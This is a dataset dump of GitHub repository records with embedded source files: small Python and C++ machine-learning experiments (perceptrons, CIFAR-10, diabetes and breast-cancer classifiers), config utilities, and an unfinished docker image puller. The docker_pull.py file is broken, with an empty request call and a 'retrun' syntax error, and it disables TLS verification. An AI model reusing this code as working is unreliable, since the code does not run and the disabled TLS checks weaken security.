repo_name (string, 5–114 chars) | repo_url (string, 24–133 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | directory_id (string, 40 chars) | branch_name (string, 209 classes) | visit_date (timestamp[ns]) | revision_date (timestamp[ns]) | committer_date (timestamp[ns]) | github_id (int64, 9.83k–683M, nullable ⌀) | star_events_count (int64, 0–22.6k) | fork_events_count (int64, 0–4.15k) | gha_license_id (string, 17 classes) | gha_created_at (timestamp[ns]) | gha_updated_at (timestamp[ns]) | gha_pushed_at (timestamp[ns]) | gha_language (string, 115 classes) | files (list, 1–13.2k items) | num_files (int64, 1–13.2k) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
crook/LuoYunCloud | https://github.com/crook/LuoYunCloud | 1ccb51ab0bbebad4983af37ce17b290f2b00dd6a | a55380abaf3436632cb71dbf71832b231b0c4dba | 663e78a659f5468b493ca6e5f62b34e81615322e | refs/heads/master | 2021-01-15T23:35:09.097300 | 2013-08-17T05:29:44 | 2013-08-17T05:29:44 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6271777153015137,
"alphanum_fraction": 0.6289198398590088,
"avg_line_length": 17.19354820251465,
"blob_id": "dcebc5bab3b3a58573bc7fb7bfde7276a0fa3acc",
"content_id": "780796c7114ae5dc6ff74686e7aef865d5984329",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/lyweb/app/site/utils.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "from .models import SiteConfig\n\nfrom yweb import orm\nfrom settings import runtime_data\n\n\ndef get_site_config(key, default_value=None):\n\n dbsession = runtime_data.get('dbsession')\n if not dbsession:\n dbsession = orm.create_session()\n runtime_data['dbsession'] = dbsession\n\n db = dbsession()\n v = SiteConfig.get(db, key, default_value)\n\n dbsession.remove()\n\n return v\n\n\ndef get_site_config_int(key, default_value=None):\n\n v = get_site_config(key, default_value)\n\n try:\n v = int(v)\n except:\n v = 0\n\n return v\n\n \n"
},
{
"alpha_fraction": 0.5478522777557373,
"alphanum_fraction": 0.5493594408035278,
"avg_line_length": 21.116666793823242,
"blob_id": "1d783a9353c5b414cba648726d807e91b446ac8c",
"content_id": "afa6615f63e19184a5334b1267be147eccada212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 60,
"path": "/lyweb/lib/ytool/ini.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport ConfigParser\n\nclass ConfigINI:\n\n def __init__(self, config, catalog=None):\n self.config = config\n self._load()\n self.catalog = catalog\n\n\n def _load(self):\n self.cf = ConfigParser.ConfigParser()\n self.cf.read( self.config )\n\n\n def set_catalog(self, catalog):\n self.catalog = catalog\n\n\n def get(self, key, default=None, catalog=None):\n\n if not catalog:\n if self.catalog:\n catalog = self.catalog\n else:\n return False\n\n if self.cf.has_option(catalog, key):\n return self.cf.get(catalog, key)\n else:\n return default\n\n\n def get2(self, key, default=None, catalog=None):\n self._load()\n return self.get(catalog, key, default)\n\n\n def set(self, key, value, catalog=None):\n\n if not catalog:\n if self.catalog:\n catalog = self.catalog\n else:\n return False\n\n if not self.cf.has_section( catalog ):\n self.cf.add_section( catalog )\n return self.cf.set(catalog, key, value)\n\n\n def set2(self, key, value, catalog=None):\n self._load()\n return self.cf.set(key, value, catalog)\n\n\n def save(self):\n self.cf.write( open( self.config, 'w' ) )\n"
},
{
"alpha_fraction": 0.38063064217567444,
"alphanum_fraction": 0.4054054021835327,
"avg_line_length": 21.421052932739258,
"blob_id": "af4fa55a1ade2280b45744eed86e0105e1d19881",
"content_id": "3841613b753f7fcf37f2a0a2f7b9dfa80532d990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/lyweb/lib/ytool/params.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "def str2intlist(string, spliter=','):\n ''' String to integer list\n\n Input: '1, 2, 3, 4, 5, a, b, c, ...'\n Output: ([1, 2, 3, 4, 5, ...], ['a', 'b', 'c', ...])\n '''\n\n if not string: string = ''\n\n OK, FAIL = [], []\n L = [ x.strip() for x in string.split(spliter) ]\n for x in L:\n try:\n x = int(x)\n OK.append(x)\n except:\n FAIL.append(x)\n\n return OK, FAIL\n \n \n"
}
] | 3 |
jeannekamikaze/ann | https://github.com/jeannekamikaze/ann | ea258fdcece54bfd8d02263b89c33162089d0619 | f49b3cd9b1810f711331d43d2b0245bd16578b8f | 4d2c0effcd90da721a45aa42233c896fb14be760 | refs/heads/master | 2021-01-18T22:15:24.559181 | 2020-10-12T17:00:57 | 2020-10-12T17:00:57 | 87,038,618 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 26,
"blob_id": "6033589bdb44bf84ba96b5a5915f6d7c4dbf1831",
"content_id": "53c9de79e994d28382e4cf3f444319bfdfc4d8da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 2,
"path": "/README.md",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "# ann\nArtificial neural networks learning experiments\n"
},
{
"alpha_fraction": 0.5495662689208984,
"alphanum_fraction": 0.578066885471344,
"avg_line_length": 28.88888931274414,
"blob_id": "3593bb7a0f63fe39f5b804705ee34f761fcb264b",
"content_id": "3193b21b9bb1ee493790a01ddbe3c4b567aa00a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1614,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 54,
"path": "/multi-perceptron.cc",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "// This is an implementation for the multiple-neuron perceptron example\n// in chapter 4 of the Neural Network Design book by Martin Hagan.\n\n#include <eigen3/Eigen/Dense>\n#include <vector>\n#include <iostream>\n\nusing namespace Eigen;\n\ndouble hardlim (double x)\n{\n return x >= 0 ? 1 : 0;\n}\n\ndouble feedforward (const MatrixXd& W, const VectorXd& p)\n{\n return hardlim((W*p)[0]);\n}\n\nint main ()\n{\n // Set initial values for the weight matrix.\n double bias = 0.5;\n MatrixXd W(1,4); W << 0.5, -1.0, -0.5, bias;\n\n // Example input/output pairs.\n // Extended with a last value of 1 that multiplies the bias.\n VectorXd p1(4); p1 << 1, -1, -1, 1;\n VectorXd p2(4); p2 << 1, +1, -1, 1;\n std::vector<VectorXd> inputs { p1, p2 };\n std::vector<double> targets { 0, 1 };\n\n // Train the network.\n // It is kind of dumb to iterate many times here because we know\n // the network converges in 3 steps for this particular problem,\n // but this is what you would do in the general case.\n for (int i = 0; i < 100; ++i)\n {\n for (std::size_t i = 0; i < inputs.size(); ++i)\n {\n const VectorXd& p = inputs[i];\n double t = targets[i];\n double o = feedforward(W,p); // network output\n double e = t-o; // error\n W = W + (e*p).transpose(); // update weights using perceptron learning rule\n }\n }\n\n std::cout << \"Weight matrix: \" << W << std::endl;\n std::cout << p1.transpose() << \" -> \" << feedforward(W,p1) << std::endl;\n std::cout << p2.transpose() << \" -> \" << feedforward(W,p2) << std::endl;\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6117318272590637,
"alphanum_fraction": 0.647185206413269,
"avg_line_length": 30.445945739746094,
"blob_id": "6e3284eb2da3480ade507485bd805d953b3dc54a",
"content_id": "c7e9bde9c1502118bf89b7006b610f1283a266bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4654,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 148,
"path": "/cifar.py",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#\n# Chapter 2 of \"Generative Deep Learning: Teaching Machines to Paint, Write,\n# Compose, and Play\".\n\n# Get Tensorflow to shut up.\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport argparse\nfrom keras.datasets import cifar10\nfrom keras.layers import BatchNormalization, Conv2D, Dense, Dropout, Flatten, Input, LeakyReLU\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nNUM_CLASSES = 10\n\n\ndef normalize(pixels: np.array):\n \"\"\"Map the given pixels array from integers in the range 0..255 to float32s\n in the range 0..1.\"\"\"\n return pixels.astype('float32') / 255.0\n\n\ndef build_model(tag: str) -> Model:\n \"\"\"Build a model for prediction.\n\n Args:\n tag: Either 'dense' or 'convolutional'.\n \"\"\"\n if tag == \"dense\":\n model = Sequential([\n Flatten(input_shape=(32, 32, 3)),\n Dense(200, activation='relu'),\n Dense(150, activation='relu'),\n Dense(NUM_CLASSES, activation='softmax')\n ])\n # The same model built using the Functional API.\n # input_layer = Input(shape=(32, 32, 3))\n # x = Flatten()(input_layer)\n # x = Dense(units=200, activation = 'relu')(x)\n # x = Dense(units=150, activation = 'relu')(x)\n # output_layer = Dense(units=10, activation = 'softmax')(x)\n # model = Model(input_layer, output_layer)\n elif tag == \"convolutional\":\n model = Sequential([\n Input(shape=(32,32,3)),\n Conv2D(filters=32, kernel_size=3, strides=1, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=32, kernel_size=3, strides=2, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=64, kernel_size=3, strides=1, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=64, kernel_size=3, strides=2, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Flatten(),\n Dense(128),\n BatchNormalization(),\n LeakyReLU(),\n Dropout(rate=0.5),\n Dense(NUM_CLASSES, activation='softmax')\n ])\n else:\n raise ValueError(\"tag must be 'dense' or 'convolutional'\")\n model.build()\n return model\n\n\ndef train_model(model: Model, x_train: np.array, y_train: np.array):\n \"\"\"Train the model.\"\"\"\n optimizer = Adam(lr=0.0005)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer,\n metrics=['accuracy'])\n model.fit(x_train, y_train, batch_size = 12, epochs = 10, shuffle = True)\n\n\ndef plot_results(model: Model, x_test, y_test):\n \"\"\"Plot a random subset of predictions on the test data.\"\"\"\n\n def prob_to_class(probabilities: np.array):\n \"\"\"Run predictions on a set of images.\"\"\"\n assert probabilities.shape[1] == 10 # Should have 10 probabilities.\n CLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck'])\n predictions = CLASSES[np.argmax(probabilities, axis=-1)]\n return predictions\n\n predicted = prob_to_class(model.predict(x_test))\n actual = prob_to_class(y_test)\n\n total_images = 10 # Number of images to show.\n image_indices = np.random.choice(range(len(x_test)), total_images)\n\n fig = plt.figure(figsize=(15, 3))\n fig.subplots_adjust(hspace=0.4, wspace=0.4)\n\n for i, image_index in enumerate(image_indices):\n img = x_test[image_index]\n ax = fig.add_subplot(1, total_images, i+1)\n ax.axis('off')\n ax.text(0.5, -0.35, 'pred = ' + str(predicted[image_index]), fontsize=10,\n ha='center', transform=ax.transAxes)\n ax.text(0.5, -0.7, 'act = ' + str(actual[image_index]), 
fontsize=10,\n ha='center', transform=ax.transAxes)\n ax.imshow(img)\n\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"arch\", type=str, choices=[\"dense\", \"convolutional\"])\n args = parser.parse_args()\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n print(\"x_train:\", x_train.shape) # (50000, 32, 32, 3)\n print(\"y_train:\", y_train.shape) # (50000, 1)\n print(\"x_test:\", x_test.shape) # (10000, 32, 32, 3)\n print(\"y_test:\", y_test.shape) # (10000, 1)\n\n # Normalize for better performance in training.\n x_train = normalize(x_train)\n x_test = normalize(x_test)\n\n # Create one-hot encodings of the class labels 0..9.\n y_train = to_categorical(y_train, NUM_CLASSES) # shape = (50000, 10)\n y_test = to_categorical(y_test, NUM_CLASSES) # shape = (10000, 10)\n\n model = build_model(args.arch)\n print(model.summary())\n\n train_model(model, x_train, y_train)\n\n model.evaluate(x_test, y_test)\n\n plot_results(model, x_test, y_test)\n\n\nmain()\n"
},
{
"alpha_fraction": 0.5382103323936462,
"alphanum_fraction": 0.5574787855148315,
"avg_line_length": 24.098360061645508,
"blob_id": "adbf88537cba91769d496e083efa7b826288f328",
"content_id": "385cc0089da8b638daedcde6715cb1489c489058",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3062,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 122,
"path": "/perceptron.cc",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <functional>\n#include <random>\n#include <iostream>\n\nstd::ostream& operator<< (std::ostream& os, const std::vector<double>& vector)\n{\n if (vector.size() == 0)\n {\n os << \"[]\";\n }\n else\n {\n os << \"[\";\n for (std::size_t i = 0; i < vector.size()-1; ++i)\n os << vector[i] << \", \";\n os << vector[vector.size()-1];\n os << \"]\";\n }\n return os;\n}\n\nusing RandGen = std::mt19937;\nusing Activation_Function = std::function<double(double)>;\n\n/// Evaluate the perceptron.\ndouble feedforward (\n const std::vector<double>& input,\n const std::vector<double>& weight,\n const Activation_Function& activate)\n{\n double sum = 0.0;\n for (std::size_t i = 0; i < input.size(); ++i) {\n sum += input[i] * weight[i];\n }\n return activate(sum);\n}\n\n/// Binary activation function.\ndouble activate (double out)\n{\n return out >= 0.0 ? 1.0 : -1.0;\n}\n\n/// Adjust the perceptron's weights.\nvoid adjust_weights (\n double c, // learning rate\n double error,\n const std::vector<double>& input,\n std::vector<double>& weight)\n{\n for (std::size_t i = 0; i < weight.size(); ++i)\n {\n weight[i] = weight[i] + c * error * input[i];\n }\n}\n\n/// Train a perceptron so that it is able to separate points above and below\n/// the y = x line.\nvoid train_yx (RandGen& gen, std::vector<double>& weight)\n{\n std::uniform_real_distribution<double> rand(-10, 10);\n const int max_iterations = 10000;\n double c = 0.1; // learning rate\n\n std::vector<double> input(3);\n input[2] = 1; // bias is always 1\n\n for (int i = 0; i < max_iterations; ++i)\n {\n // Generate an input with a known solution.\n input[0] = rand(gen); // x\n input[1] = rand(gen); // y\n double sol = input[1] >= input[0] ? 1.0 : -1.0; // +1 above the line, -1 below\n\n // Adjust the perceptron's weights.\n double out = feedforward(input, weight, activate);\n double error = sol - out;\n adjust_weights(c, error, input, weight);\n\n // Adjust learning rate to help convergence\n c = 0.999 * c;\n\n std::cout << \"W: \" << weight << \", E: \" << error << \", C: \" << c << std::endl;\n }\n}\n\n/// Return a vector of size 'n' with values uniformly distributed in [a,b).\ntemplate <typename RandGen>\nstd::vector<double> random_vector (RandGen& gen, std::size_t n, double a, double b)\n{\n std::vector<double> vector(n);\n std::uniform_real_distribution<double> rand(a,b);\n for (double& x : vector)\n {\n x = rand(gen);\n }\n return vector;\n}\n\nint main ()\n{\n std::random_device rd;\n RandGen gen(rd());\n\n std::vector<double> weight = random_vector(gen, 3, -1, 1);\n train_yx(gen, weight);\n\n std::vector<std::vector<double>> inputs = {\n // last value is the bias\n { 2, 5, 1 },\n { 3, 1, 1 }\n };\n\n for (auto input : inputs)\n {\n double output = feedforward(input, weight, activate);\n std::cout << input << \" -> \" << output << std::endl;\n }\n\n return 0;\n}\n"
}
] | 4 |
NelluriRam/diabetic-occurence-predictor | https://github.com/NelluriRam/diabetic-occurence-predictor | c303d86b69c583a7b9c9df6d26c740d5bc441dbd | 0f2a877ac797efa6d5cd52da6b65e3ba0c609a56 | 88432f98675b0d61b99509bd2b2c5fb688a86bc4 | refs/heads/master | 2023-01-04T21:07:01.472173 | 2020-10-14T06:29:14 | 2020-10-14T06:29:14 | 303,694,160 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.73591548204422,
"alphanum_fraction": 0.7453051805496216,
"avg_line_length": 34.54166793823242,
"blob_id": "f124c999412c7991e04339f7468e3d1bb5586526",
"content_id": "d2d2f2489b9fb5c0ddf6ea8c96bb93b558f0745f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/main.py",
"repo_name": "NelluriRam/diabetic-occurence-predictor",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport pickle\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\ndata = pd.read_csv('diabetes2.csv')\ndf = pd.DataFrame(data)\n#print(df)\ndf['Outcome'].value_counts()\narray = data.values\nX = array[:,0:4]\ny = array[:,4]\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3,random_state=21)\nreg=LogisticRegression()\nreg.fit(X_train,y_train)\ny_log_pred = reg.predict(X_test)\ny_log = reg.predict(X_train)\nprint('Accuracy Score of your model in training is : ',metrics.accuracy_score(y_train,y_log))\nprint('Accuracy Score of your model is : ',metrics.accuracy_score(y_test,y_log_pred))\nroc_auc_score(y_test,y_log_pred)\npickle.dump(reg,open('model.pkl','wb'))\nmodel=pickle.load(open('model.pkl','rb'))"
}
] | 1 |
gldnpz17/RekdatAssignmentLO5 | https://github.com/gldnpz17/RekdatAssignmentLO5 | 289afd7b03077cfab47ce76a457843869c94b3de | 130b331a1e106a202207dc343ca48102c071e1b2 | ae747e9d503cc99fdfb781dc5d3e751c725d8074 | refs/heads/master | 2023-07-26T11:09:02.397344 | 2021-09-10T00:23:32 | 2021-09-10T00:23:32 | 404,907,782 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6511884927749634,
"alphanum_fraction": 0.6539524793624878,
"avg_line_length": 19.55681800842285,
"blob_id": "3f4df42a5487ecaa116db210bf80f6b97e042083",
"content_id": "733b9172040d963f0575d101bbae15905a79142a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1809,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 88,
"path": "/FoodData.py",
"repo_name": "gldnpz17/RekdatAssignmentLO5",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\n\nraw_data = pd.read_csv('menu.csv')\nmenu_data = raw_data[['Category', 'Serving Size', 'Calories']]\n\n# Parse numerical data.\nfor index, row in menu_data.iterrows():\n weight = (re.search('\\\\((\\\\d+) g\\\\)', row['Serving Size']))\n if weight is None:\n menu_data.at[index, 'Serving Size'] = np.nan\n else:\n menu_data.at[index, 'Serving Size'] = float(weight.group(1))\n\nmenu_data.dropna(inplace=True)\n\nprint(menu_data)\n\n# Calculate calorie density.\nmenu_data['Calorie Density'] = menu_data['Calories']/menu_data['Serving Size']\n\n# Serving size boxplot.\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Serving Size',\n).set(\n xlabel='Kategori',\n ylabel='Takaran sajian (gram)',\n title='Boxplot Takaran Sajian Makanan'\n)\nplt.show()\n\n# Calorie boxplot.\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Calories',\n).set(\n xlabel='Kategori',\n ylabel='Kalori (kalori)',\n title='Boxplot Kalori Makanan'\n)\nplt.show()\n\n# Calorie density boxplot\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Calorie Density'\n).set(\n xlabel='Kategori',\n ylabel='Densitas Kalori (kalori/gram)',\n title='Boxplot Densitas Kalori Makanan'\n)\nplt.show()\n\n# Calorie density histogram.\ngrid = sns.FacetGrid(\n menu_data,\n col='Category',\n height=2,\n col_wrap=3\n)\ngrid.map(sns.histplot, 'Calorie Density')\nplt.show()\n\n# Menu scatterplot combined.\nsns.scatterplot(\n data=menu_data,\n x='Serving Size',\n y='Calories',\n hue='Category'\n)\nplt.show()\n\n# Menu scatterplot separate.\ngrid = sns.FacetGrid(\n menu_data,\n col='Category',\n height=2,\n col_wrap=3\n)\ngrid.map(sns.scatterplot, 'Serving Size', 'Calories')\nplt.show()\n"
}
] | 1 |
perrenwright/deeplearning | https://github.com/perrenwright/deeplearning | ce47cd644dc91b29f04f9cd1c7720fbd348dad58 | 01675d8cb348633a3f3dd4e534d8d3dc3fd0b47d | 375b27eaffbf52f4e185360dc509cd36d85b8f9d | refs/heads/master | 2020-04-28T13:36:35.777088 | 2019-08-26T23:27:38 | 2019-08-26T23:27:38 | 175,311,058 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7258829474449158,
"alphanum_fraction": 0.73695307970047,
"avg_line_length": 39.36170196533203,
"blob_id": "8ddd95a7216773bdc2da9f607cab44122ecd5ed8",
"content_id": "98f2fc84a1beaeab1d42d65f2e567081317c6ee8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1897,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 47,
"path": "/deeplearning.py",
"repo_name": "perrenwright/deeplearning",
"src_encoding": "UTF-8",
"text": "#Deep Learning\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as pyplot\nimport scipy\nfrom sklearn.metrics import accuracy_score \nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\n#Reading in the data\nprint(\"Breast Cancer Wisconsin (Diagnostic) Data Set\")\n\n#datasets from the website \nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/wdbc.data\"\n\n\n#32 attributes\nattributes = [\"ID\", \"Diagnosis\", \"mean radius\", \"mean texture\", \"mean perimeter\", \"mean area\", \"mean smoothness\", \"mean compactness\", \"mean concavity\", \"mean concave points\", \"mean symmetry\", \"mean fractal dimension\", \n\"radius se\", \"texture se\", \"perimeter se\", \"area se\", \"smoothness se\", \"compactness se\", \"concavity se\", \"concave points se\", \"symmetry se\", \"fractal dimension se\", \n\"radius worst\", \"texture worst\", \"perimeter worst\", \"area worst\", \"smoothness worst\", \"compactness worst\", \"concavity worst\", \"concave points worst\", \"symmetry worst\", \"fractal dimesion worst\"]\n\ndf = pd.read_csv(url, names = attributes)\ndf.dropna(0, how ='any')\narray = df.values \n\nX = array[:569, 2:32]\nY_char = np.array(array[:569, 1])\nychar, y = np.unique(Y_char, return_inverse= True)\n\n#transformed to fit the mean value of a column\nimputer = Imputer()\nX_transf = imputer.fit_transform(X)\n\n#Splitting the dataset\nX_train, X_test, y_train, y_test = train_test_split(X_transf, y, test_size = 0.3)\n\n#Deep Learning Model Fit\nclf = MLPClassifier(solver='lbfgs', alpha = 1e-5, hidden_layer_sizes=(3, 1), random_state=1)\nclf = clf.fit(X_train, y_train)\n\ny_pred = clf.predict(X_test)\nscore = clf.score(X_test, y_test)\nreport = classification_report(y_test, y_pred)\nprint(report)\nprint(\"The score is: \" + str(score))\n"
},
{
"alpha_fraction": 0.8125,
"alphanum_fraction": 0.8125,
"avg_line_length": 55,
"blob_id": "7a583464ac5743002896173e61bd74c40597d713",
"content_id": "9e2dfa8c88a2c5c91ed170118f89a5d0efa65d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 2,
"path": "/README.md",
"repo_name": "perrenwright/deeplearning",
"src_encoding": "UTF-8",
"text": "# Deep Learning Model\nDescription: This model is a sklearn deep nueral network model on a Breast Cancer Dataset\n"
}
] | 2 |
AssKicker0214/docker_pull | https://github.com/AssKicker0214/docker_pull | 8f647ca9d03d03d60c13486e92f1c7304787a255 | a890752299af7cf20b3b1123d613c06703b7f08d | faecfedb21c6506eaac864a5a2954a6411b4b6aa | refs/heads/master | 2021-01-07T18:56:36.212185 | 2020-02-20T10:34:27 | 2020-02-20T10:34:27 | 241,789,793 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7727272510528564,
"avg_line_length": 21,
"blob_id": "30316384221a92aadbf6164675d5d810ab1378ef",
"content_id": "b2272cbefcbb0ca0a6b7522024ed40ec3439b855",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 2,
"path": "/README.md",
"repo_name": "AssKicker0214/docker_pull",
"src_encoding": "UTF-8",
"text": "# docker_pull\nPull docker image as tar ball\n"
},
{
"alpha_fraction": 0.5731059312820435,
"alphanum_fraction": 0.5977075695991516,
"avg_line_length": 35.5,
"blob_id": "766caf02e3e279e59321d091cbba25024e338c45",
"content_id": "ac82ff68fc8e99aa690a8dfee97e7e8be04d4ab1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3577,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 98,
"path": "/docker_pull.py",
"repo_name": "AssKicker0214/docker_pull",
"src_encoding": "UTF-8",
"text": "\"\"\"\n1. python debugger cannot use `172.16.1.245:8080` proxy, but python itself can. use localhost `port2port`\n2. `requests` considers `http` and `https` as two different protocols, when using proxies\n\"\"\"\nimport requests\nimport socket\nimport re\nfrom typing import Tuple\n\n\n# PROXIES = {'https': '172.16.1.245:8080', 'http': '172.16.1.245:8080'}\nPROXIES = {'https': 'localhost:54321', 'http': 'localhost:54321'}\n\ndef parse_name(name):\n components = name.split(\"/\")\n image_name, tag_name, *_ = components.pop().split(\":\") + [\"latest\"]\n\n if len(components) > 0 and ('.' in components[0] or ':' in components[0]):\n registry_name = components[0]\n repository_name = '/'.join(components[1:]) or \"library\"\n else:\n registry_name = \"registry-1.docker.io\"\n repository_name = '/'.join(components) or \"library\"\n\n return registry_name, repository_name, image_name, tag_name\n\n\ndef get_auth_header(registry_name, image_name, repository_name=\"library\", protocol=\"https\"):\n try:\n res = requests.get(\"%s://%s/v2\" % (protocol, registry_name), proxies=PROXIES, verify=False)\n if res.status_code == 200:\n return {} # no need for authentication, thus no auth header.\n if res.status_code == 401: # 401 Unauthorized\n print(\"Authenticating... refer to https://docs.docker.com/registry/spec/auth/token/ \")\n\n \"\"\"\n Bearer realm=\"https://auth.docker.io/token\",service=\"registry.docker.io\"\n \"\"\"\n www_authenticate = res.headers['WWW-Authenticate']\n ptn = re.compile(r'realm=\"(.*)\".*service=\"(.*)\"')\n m = ptn.search(www_authenticate)\n if m:\n auth_url = m.group(1)\n auth_svc = m.group(2)\n auth_res = requests.get(\n \"%s?service=%s&scope=repository:%s/%s:pull\" % (auth_url, auth_svc, repository_name, image_name),\n proxies=PROXIES,\n verify=False\n )\n token = auth_res.json()['token']\n auth_header = {\n 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/vnd.docker.distribution.manifest.v2+json'\n }\n return auth_header\n\n return None\n except requests.exceptions.SSLError as e:\n print(e)\n print(\"Switch to HTTP\")\n return get_auth_header(registry_name, image_name, repository_name=repository_name, protocol=\"http\")\n except Exception as e:\n print(e)\n print(\"Connection failed\")\n return None\n\n\ndef get_image_digest(registry_name, repository_name, image_name, tag_name, auth_header: dict) -> dict:\n assert auth_header is not None\n res = requests.get(\n \n )\n\n\ndef pull(image: str):\n registry_name, repository_name, image_name, tag_name = parse_name(image)\n auth_hdr = get_auth_header(registry_name, image_name, repository_name=repository_name)\n\n if auth_hdr is None:\n print(\"Cannot access to registry: authentication is required but no token can be fetched\")\n retrun False\n\n get_image_digest(registry_name, repository_name, image_name, tag_name, auth_hdr)\n \n\nif __name__ == \"__main__\":\n \"\"\"\n # test\n print(parse_name(\"docker.io/repo/alpine:2\"))\n print(parse_name(\"docker.io/repo/alpine\"))\n print(parse_name(\"docker.io/alpine:3\"))\n print(parse_name(\"repo/alpine:4\"))\n print(parse_name(\"alpine\"))\n \"\"\"\n\n hdr = get_auth_header(\"registry-1.docker.io\", \"alpine\")\n print(hdr)\n # auth(\"172.21.54.98:5000\")\n"
}
] | 2 |
fharookshaik/WHO-Covid-19-Global-reports-download-automation | https://github.com/fharookshaik/WHO-Covid-19-Global-reports-download-automation | 9d085fe27df698534018743f750708a4c16a31e3 | 1faaca29c301170f84f98c5702b552448d908500 | 6e7da1ee17789616c4dee775fef00d22f5fc3de1 | refs/heads/main | 2023-06-23T12:51:14.816465 | 2021-07-11T16:41:06 | 2021-07-11T16:41:06 | 377,531,580 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7233009934425354,
"alphanum_fraction": 0.7512136101722717,
"avg_line_length": 32.863014221191406,
"blob_id": "ad75c75b04b3a4f63ea6a8965b26c640d5165360",
"content_id": "d2d69b7ff2b5e9b010b0f0d3ac6b32e1d1c324df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2472,
"license_type": "permissive",
"max_line_length": 249,
"num_lines": 73,
"path": "/README.md",
"repo_name": "fharookshaik/WHO-Covid-19-Global-reports-download-automation",
"src_encoding": "UTF-8",
